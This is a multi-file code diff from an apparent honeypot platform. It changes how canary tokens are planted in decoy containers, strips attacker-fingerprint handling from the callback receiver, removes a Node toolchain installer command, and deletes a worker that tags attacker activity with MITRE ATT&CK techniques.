    payload = base64.b64encode(artifact.content)
    mtime = int(time.time() + artifact.mtime_offset)
    mode_str = oct(artifact.mode)[2:]  # drop the "0o" prefix for chmod

    steps = (
        f"mkdir -p {parent}",
        f"base64 -d > {target}",
        f"chmod {mode_str} {target}",
        f"touch -d @{mtime} {target}",
    )
    script = " && ".join(steps)
    return script, payload
async def _publish(
@@ -93,7 +139,6 @@ async def plant(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container.
@@ -112,12 +157,13 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err
target_container = container or _container_for(decky_name)
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
success, error = await write_file_to_container(
target_container, artifact.path, artifact.content,
mode=artifact.mode, mtime=mtime,
)
sh_cmd, stdin_payload = _build_plant_command(artifact)
# ``-i`` keeps stdin attached so base64 -d inside the container can
# consume the encoded payload streamed from the host.
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None:
if success:
@@ -136,8 +182,8 @@ async def plant(
if not success:
log.warning(
"canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, target_container, error,
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
decky_name, token_uuid, rc, stderr[:120],
)
return success, error
@@ -150,7 +196,6 @@ async def revoke(
repo: Optional[BaseRepository] = None,
publish: bool = True,
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish.
@@ -158,10 +203,11 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False.
"""
target_container = container or _container_for(decky_name)
success, error = await delete_file_from_container(
target_container, placement_path,
)
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv)
success = rc == 0
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -204,7 +250,6 @@ async def seed_baseline(
persona: str = "linux",
created_by: str = "system",
bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky.
@@ -248,59 +293,9 @@ async def seed_baseline(
await plant(
decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
)
out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path,
})
return out
async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
    """Seed the baseline canary set on each decky of one topology.

    Topology counterpart of :func:`seed_baseline`. The target container
    for every decky is resolved with :func:`resolve_topology_container`
    from the decky's service list rather than assuming an ssh container.

    Deckies without a resolvable name are skipped. A topology that cannot
    be hydrated logs a warning and yields an empty list.

    Returns:
        One flat list of the per-token dicts returned by
        :func:`seed_baseline`, each extended with a ``decky_name`` key.
    """
    from decnet.topology.persistence import hydrate

    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []

    planted: list[dict[str, Any]] = []
    for decky in hydrated["deckies"]:
        # Prefer the name from decky_config; fall back to the decky's own.
        decky_name = (decky.get("decky_config") or {}).get("name") or decky.get("name")
        if not decky_name:
            continue
        container = resolve_topology_container(
            topology_id, decky_name, decky.get("services") or [],
        )
        # MazeNET deckies don't carry an OS persona today; default to
        # linux (every base image we ship is Linux).
        rows = await seed_baseline(
            decky_name, repo,
            persona="linux", created_by=created_by, bus=bus,
            container=container,
        )
        for row in rows:
            row["decky_name"] = decky_name
        planted.extend(rows)
    return planted

View File

@@ -26,14 +26,9 @@ crashes loudly rather than masking failures.
from __future__ import annotations
import asyncio
import base64
import binascii
import json
import os
import time
import uuid
from datetime import datetime, timezone
from typing import Any, Optional
from typing import Optional
from fastapi import FastAPI, Request, Response
@@ -55,41 +50,6 @@ _TRANSPARENT_GIF = bytes.fromhex(
)
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -144,11 +104,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit(
repo, bus,
slug=slug,
@@ -156,9 +111,7 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path),
dns_qname=None,
raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
raw_headers=dict(request.headers),
)
# Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is
@@ -176,67 +129,6 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after
@@ -262,58 +154,16 @@ async def _record_hit(
request_path: Optional[str],
dns_qname: Optional[str],
raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
The trigger row always lands regardless — the GET hit is itself forensic.
"""
token = await repo.get_canary_token_by_slug(slug)
if token is None:
return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"],
"occurred_at": datetime.now(timezone.utc),
@@ -321,7 +171,7 @@ async def _record_hit(
"user_agent": user_agent,
"request_path": request_path,
"dns_qname": dns_qname,
"raw_headers": final_headers,
"raw_headers": raw_headers or {},
})
try:
await bus.publish(
@@ -339,22 +189,6 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface --------------------------------
@@ -380,7 +214,7 @@ async def _start_dns_server(
local_addr=(_dns_bind(), _dns_port()),
)
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
return transport
return transport # type: ignore[return-value]
# ---------------------------- entry point --------------------------------

View File

@@ -39,7 +39,6 @@ from . import (
swarm,
swarmctl,
topology,
ttp,
updater,
web,
webhook,
@@ -60,7 +59,7 @@ for _mod in (
swarm,
deploy, lifecycle, workers, inventory,
web, profiler, orchestrator, realism, reconciler, sniffer, db,
topology, bus, geoip, init, webhook, canary, ttp,
topology, bus, geoip, init, webhook, canary,
):
_mod.register(app)

View File

@@ -1,13 +1,8 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Two entry points share this module:
* ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`.
Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on
@@ -16,17 +11,11 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
"""
from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer
from . import utils as _utils
from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None:
@app.command(name="canary")
@@ -51,53 +40,3 @@ def register(app: typer.Typer) -> None:
asyncio.run(run())
except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
    npm_bin: str = typer.Option(
        "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
    ),
) -> None:
    """Install the Node-side toolchain used by fingerprint canaries.

    Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
    directory so the obfuscator's helper script can ``require()``
    ``javascript-obfuscator`` at mint time. Requires Node >= 18.

    Idempotent: re-running on an already-installed tree is fast
    (npm short-circuits when ``node_modules/`` is up-to-date).
    """
    # The docstring above is kept verbatim: Typer shows it as help text.
    import decnet.canary as _canary_pkg

    # Exit codes: 2 = precondition missing, 3 = npm timed out,
    # otherwise npm's own non-zero return code.
    pkg_dir = Path(_canary_pkg.__file__).resolve().parent
    manifest = pkg_dir / "package.json"
    if not manifest.is_file():
        console.print(
            f"[red]canary package.json not found under {pkg_dir}; "
            "wheel may be missing the JS toolchain payload.[/]"
        )
        raise typer.Exit(code=2)

    npm_found = shutil.which(npm_bin) is not None
    if not npm_found:
        console.print(
            f"[red]npm executable {npm_bin!r} not found on PATH. "
            "Install Node >= 18 and re-run.[/]"
        )
        raise typer.Exit(code=2)

    console.print(
        f"[cyan]installing canary toolchain[/] in {pkg_dir}",
    )
    npm_argv = [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"]
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
            npm_argv,
            cwd=str(pkg_dir),
            capture_output=True,
            text=True,
            timeout=_TOOLCHAIN_TIMEOUT_S,
            check=False,
        )
    except subprocess.TimeoutExpired:
        console.print("[red]npm install timed out after 3 minutes[/]")
        raise typer.Exit(code=3) from None

    if proc.returncode != 0:
        console.print(
            f"[red]npm install failed rc={proc.returncode}[/]\n"
            f"{proc.stderr.strip()}"
        )
        raise typer.Exit(code=proc.returncode)
    console.print("[green]canary toolchain ready[/]")

View File

@@ -30,10 +30,6 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
"mutate", "listener", "profiler",
"services", "distros", "correlate", "archetypes", "web",
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
"ttp-backfill",
})
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
{"swarm", "topology", "geoip", "realism"}
@@ -69,7 +65,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
return
_app.registered_commands = [
c for c in _app.registered_commands
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
]
_app.registered_groups = [
g for g in _app.registered_groups

View File

@@ -44,12 +44,6 @@ _CONFIG_PLACEHOLDER = """\
# EnvironmentFile= — never in a group-readable INI.
[decnet]
# DECNET-service user/group as configured at `decnet init` time.
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
# so the same user name can have different numeric uids on master vs
# agents without breaking artifact ownership.
api-user = {api_user}
api-group = {api_group}
# mode = master # or "agent"
# [api]
@@ -80,7 +74,6 @@ api-group = {api_group}
# master-host = 10.0.0.1
# syslog-port = 6514
# swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging]
# system-log = /var/log/decnet/decnet.system.log
@@ -204,17 +197,14 @@ def _ensure_dir(
return f"skip: {path} already present" if existed else "ok"
def _ensure_config(
path: Path, group: str, *, user: str, dry_run: bool,
) -> str:
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
if path.exists():
return f"skip: {path} already present"
if dry_run:
console.print(f" [dim]would write:[/] {path}")
return "ok"
path.parent.mkdir(parents=True, exist_ok=True)
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
path.write_text(rendered)
path.write_text(_CONFIG_PLACEHOLDER)
try:
os.chmod(path, 0o640)
gid = grp.getgrnam(group).gr_gid
@@ -611,7 +601,7 @@ def register(app: typer.Typer) -> None:
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
_install_rel = install_dir.lstrip("/")
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
required_tools = ("systemctl",) if deinit else (
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
)
if deinit:
@@ -668,7 +658,7 @@ def register(app: typer.Typer) -> None:
)
_step(
"systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
)
_step(
f"remove {etc_decnet / 'decnet.ini'}",
@@ -764,13 +754,6 @@ def register(app: typer.Typer) -> None:
(pfx / _install_rel, 0o755, user, group),
(pfx / "var/lib/decnet", 0o750, user, group),
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
# DEBT-035 / DEBT-047: artifact root carries setgid (the
# 0o2... bit) so every file written under it inherits the
# decnet group regardless of which container's uid created
# it. Group-write (0o2775) lets the API process and the
# local TTP worker read each other's outputs without a
# manual chown after every fresh deploy.
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
(pfx / "var/log/decnet", 0o750, user, group),
(etc_decnet, 0o755, "root", group),
(pfx / "run/decnet", 0o755, "root", group),
@@ -792,15 +775,12 @@ def register(app: typer.Typer) -> None:
for path, mode, d_owner, d_group in dirs:
_step(
f"ensure dir {path}",
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
lambda p=path, m=mode, o=d_owner, g=d_group:
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
)
_step(
f"write {etc_decnet / 'decnet.ini'}",
lambda: _ensure_config(
etc_decnet / "decnet.ini", group,
user=user, dry_run=dry_run,
),
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
)
_step(
"install systemd units",
@@ -832,7 +812,7 @@ def register(app: typer.Typer) -> None:
)
_step(
"systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
)
if no_start:
@@ -843,7 +823,7 @@ def register(app: typer.Typer) -> None:
_step(
"systemctl enable --now decnet.target",
lambda: (
_run( # type: ignore[func-returns-value]
_run(
["systemctl", "enable", "--now", "decnet.target"],
dry_run=dry_run,
),

View File

@@ -16,16 +16,8 @@ from .utils import console, log
def register(app: typer.Typer) -> None:
@app.command()
def swarmctl(
port: int = typer.Option(
8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),

View File

@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id)
if topo is None:
return False, "not-found"
if topo.status in _RUNNING:
return False, str(topo.status)
if topo["status"] in _RUNNING:
return False, str(topo["status"])
ok = await repo.delete_topology_cascade(topology_id)
return ok, None

View File

@@ -1,309 +0,0 @@
"""``decnet ttp`` — TTP-tagging worker and admin commands.
Two flat commands share this module:
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
``attacker.session.ended`` / ``attacker.observed`` /
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
dispatches each event through :class:`CompositeTagger` (RuleEngine +
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
lifters), persists ``ttp_tag`` rows via the idempotent
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
``ttp.rule.fired.<technique_id>`` only when the insert returned a
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
so its argv must stay stable.
* ``decnet ttp-backfill`` — replays historical events (shell commands
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
through the live tagger. Writes ``ttp_tag`` rows using the same
idempotent insert path. **Does not publish** to the bus — replay must
not re-trigger SIEM/webhook fan-out on already-attributed events.
Only ``ttp-backfill`` is master-only (gated via ``MASTER_ONLY_COMMANDS`` in
:mod:`decnet.cli.gating`); ``ttp`` is also allowed to run on agents.
"""
from __future__ import annotations
import asyncio
import time
from datetime import datetime, timedelta, timezone
from typing import Any
import typer
from decnet.ttp.factory import CompositeTagger, get_tagger
from . import utils as _utils
from .utils import console, log
_BACKFILL_SOURCES = ("command", "canary", "all")
def register(app: typer.Typer) -> None:
    """Attach the ``ttp`` and ``ttp-backfill`` commands to *app*."""

    @app.command(name="ttp")
    def ttp(
        poll_interval_secs: float = typer.Option(
            60.0, "--poll-interval", "-i",
            help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """TTP-tagging worker — MITRE ATT&CK technique tagging."""
        # Imported at call time, not at module import time.
        from decnet.ttp.worker import run_ttp_worker_loop
        from decnet.web.dependencies import repo

        if daemon:
            log.info("ttp daemonizing poll=%s", poll_interval_secs)
            _utils._daemonize()

        log.info("ttp command invoked poll=%s", poll_interval_secs)
        console.print(
            f"[bold cyan]TTP tagging worker starting[/] "
            f"poll={poll_interval_secs}s"
        )
        console.print("[dim]Press Ctrl+C to stop[/]")

        async def _run() -> None:
            # The repository is initialised before the worker loop starts.
            await repo.initialize()
            await run_ttp_worker_loop(
                repo, poll_interval_secs=poll_interval_secs,
            )

        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]TTP tagging worker stopped.[/]")

    @app.command(name="ttp-backfill")
    def ttp_backfill(
        since_days: int = typer.Option(
            7, "--since-days", "-s",
            min=1, max=3650,
            help="Replay events whose source row is newer than N days ago.",
        ),
        source: str = typer.Option(
            "all", "--source",
            help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
        ),
        dry_run: bool = typer.Option(
            False, "--dry-run",
            help="Run the tagger but skip insert_tags. Reports counts only.",
        ),
        batch_size: int = typer.Option(
            500, "--batch-size",
            min=1, max=100_000,
            help="Number of tags accumulated before each repo.insert_tags call.",
        ),
    ) -> None:
        """Replay historical attacker activity through the live tagger.

        Walks ``Attacker.commands`` (per-IP shell-command history) and
        ``CanaryTrigger`` (canary callback log) since N days ago,
        builds the same :class:`TaggerEvent` shape the live worker
        emits, and persists tags via the idempotent INSERT OR IGNORE
        write. Re-running is safe — a second pass over identical
        source rows reports ``inserted=0``.

        Bus publish is intentionally suppressed; SIEM / webhook fan-out
        sees only live events, never replays.
        """
        from decnet.cli.gating import _require_master_mode
        from decnet.web.dependencies import repo

        _require_master_mode("ttp-backfill")

        # ``--source`` is a free-form string option, so it is validated by
        # hand against the allowed values; an unknown value exits with 2.
        if source not in _BACKFILL_SOURCES:
            console.print(
                f"[red]invalid --source {source!r}; expected one of "
                f"{_BACKFILL_SOURCES}[/]"
            )
            raise typer.Exit(code=2)

        # Timezone-aware UTC lower bound handed to the backfill loops.
        cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
        console.print(
            f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
            f"source={source} dry_run={dry_run} batch_size={batch_size}"
        )

        async def _run() -> None:
            await repo.initialize()
            await _backfill(
                repo,
                cutoff=cutoff,
                sources=_resolve_sources(source),
                dry_run=dry_run,
                batch_size=batch_size,
            )

        try:
            asyncio.run(_run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Backfill interrupted.[/]")
def _resolve_sources(name: str) -> tuple[str, ...]:
if name == "all":
return ("command", "canary")
return (name,)
async def _backfill(
    repo: Any,
    *,
    cutoff: datetime,
    sources: tuple[str, ...],
    dry_run: bool,
    batch_size: int,
) -> None:
    """Drive the per-source backfill loops and report structured counts.

    One :class:`CompositeTagger` is built once and reused for every
    source — the per-lifter watch fan-out the live worker performs is
    inlined here as a `watch_store()` startup task per
    :class:`WatchableTagger`, so the dispatch indexes hydrate before
    we start feeding events.

    The ``command`` slice, when requested, always runs before the
    ``canary`` slice regardless of the order of *sources*. Watch tasks
    are cancelled and awaited on exit, including when a slice raises.
    """
    # Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
    # to inject a recording fake without touching the global factory.
    tagger = get_tagger()

    watch_tasks: list[asyncio.Task[None]] = []
    if isinstance(tagger, CompositeTagger):
        for watchable in tagger.iter_watchables():
            watch_tasks.append(asyncio.create_task(watchable.watch_store()))
        # Yield once so each watch_store gets a chance to run its
        # initial `load_compiled` before we feed the first event.
        await asyncio.sleep(0.05)

    try:
        if "command" in sources:
            await _backfill_commands(
                repo, tagger, cutoff=cutoff,
                dry_run=dry_run, batch_size=batch_size,
            )
        if "canary" in sources:
            await _backfill_canaries(
                repo, tagger, cutoff=cutoff,
                dry_run=dry_run, batch_size=batch_size,
            )
    finally:
        # Request cancellation of every watcher first, then wait for each
        # one to finish; whatever a watcher raises while stopping is
        # deliberately ignored.
        for task in watch_tasks:
            task.cancel()
        for task in watch_tasks:
            try:
                await task
            except (asyncio.CancelledError, Exception):  # noqa: BLE001
                pass
async def _backfill_commands(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
) -> None:
    """Replay recorded shell commands through *tagger* and persist the tags.

    Iterates ``repo.iter_attacker_commands_since(cutoff)``, builds one
    ``source_kind="command"`` :class:`TaggerEvent` per command that carries
    a string body, and flushes the accumulated tags through :func:`_flush`
    whenever at least *batch_size* are pending. Prints a one-line summary
    when the walk completes.
    """
    from decnet.ttp.base import TaggerEvent

    t0 = time.monotonic()
    attacker_count = 0
    command_count = 0
    written = 0
    buffer: list[Any] = []

    async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
        attacker_count += 1
        for position, entry in enumerate(commands):
            # Every command is counted, including ones skipped just below.
            command_count += 1
            body = entry.get("command_text") or entry.get("text")
            if not isinstance(body, str):
                continue
            # First truthy identifier wins; the positional fallback is only
            # built when the record carries none of them.
            source_id = (
                entry.get("id")
                or entry.get("uuid")
                or entry.get("command_id")
                or f"{attacker.uuid}#cmd{position}"
            )
            produced = await tagger.tag(
                TaggerEvent(
                    source_kind="command",
                    source_id=str(source_id),
                    attacker_uuid=attacker.uuid,
                    identity_uuid=getattr(attacker, "identity_id", None),
                    session_id=entry.get("session_id"),
                    decky_id=entry.get("decky_id") or entry.get("decky"),
                    payload={**entry, "command_text": body},
                )
            )
            if not produced:
                continue
            buffer.extend(produced)
            if len(buffer) < batch_size:
                continue
            written += await _flush(repo, buffer, dry_run)
            buffer = []

    # Drain whatever is left below the batch threshold.
    if buffer:
        written += await _flush(repo, buffer, dry_run)

    duration = time.monotonic() - t0
    console.print(
        f"source=command rows={attacker_count} commands={command_count} "
        f"inserted={written} dry_run={dry_run} elapsed_s={duration:.2f}"
    )
async def _backfill_canaries(
    repo: Any,
    tagger: Any,
    *,
    cutoff: datetime,
    dry_run: bool,
    batch_size: int,
) -> None:
    """Replay canary trigger rows through *tagger* and persist the tags.

    Iterates ``repo.iter_canary_triggers_since(cutoff)``, builds one
    ``source_kind="canary_fingerprint"`` :class:`TaggerEvent` per trigger,
    and flushes the accumulated tags through :func:`_flush` whenever at
    least *batch_size* are pending. Prints a one-line summary when the walk
    completes.
    """
    from decnet.ttp.base import TaggerEvent

    t0 = time.monotonic()
    trigger_count = 0
    written = 0
    buffer: list[Any] = []

    async for trigger in repo.iter_canary_triggers_since(cutoff):
        trigger_count += 1
        fingerprint = {
            "token_uuid": trigger.token_uuid,
            "src_ip": trigger.src_ip,
            # Same source attribute as "user_agent", defaulted to "".
            "ua_signature": trigger.user_agent or "",
            "user_agent": trigger.user_agent,
            "request_path": trigger.request_path,
            "dns_qname": trigger.dns_qname,
